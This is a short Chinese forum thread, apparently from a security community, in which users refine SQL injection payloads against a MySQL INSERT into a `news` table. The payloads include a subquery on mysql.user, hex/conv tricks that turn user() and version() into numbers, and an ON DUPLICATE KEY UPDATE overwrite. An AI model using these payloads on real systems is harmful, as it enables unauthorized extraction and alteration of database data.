围观鬼哥大神...

nr`),(1,(select 1 from mysql.user limit 1)) #

看错了，没看到逗号被替换了。

INSERT INTO `news` (`id`, `nr`) VALUES (0, `id`+hex(user())-`id`) 这样呢？

@Joker 有想法

@Joker 这个问题抽象下就是如何把一个字符串变成一个数字类型的问题

INSERT INTO `news` (`id`, `nr`) VALUES (1, `id`+conv(hex(mid(version(),1,5)),16,10)+`id`)

試試ON DUPLICATE KEY UPDATE

@Joker 这样有字符限制。。但是这样都被你想到了佩服！！

@xsser 有字符限制哦。难办。。

@/fd INSERT INTO `news` (`id`, `nr`) VALUES (1,`s`) ON DUPLICATE KEY UPDATE nr='sss'

语句执行成功，但是查看结果nr依旧等于 s 并没等于 sss 不知道为什么。 。

@/fd OK。找到为什么了。谢谢了。可以解决了。

牛人呀。。必须感谢WB

补充下 INSERT INTO `news` (`id`, `nr`) VALUES (1,`s`) ON DUPLICATE KEY UPDATE nr='sss'

语句执行成功，但是查看结果nr依旧等于 s 并没等于 sss 不知道为什么

插2次这条语句就可以看到结果了。

commit

mark

@鬼哥 我也觉得是没有commit;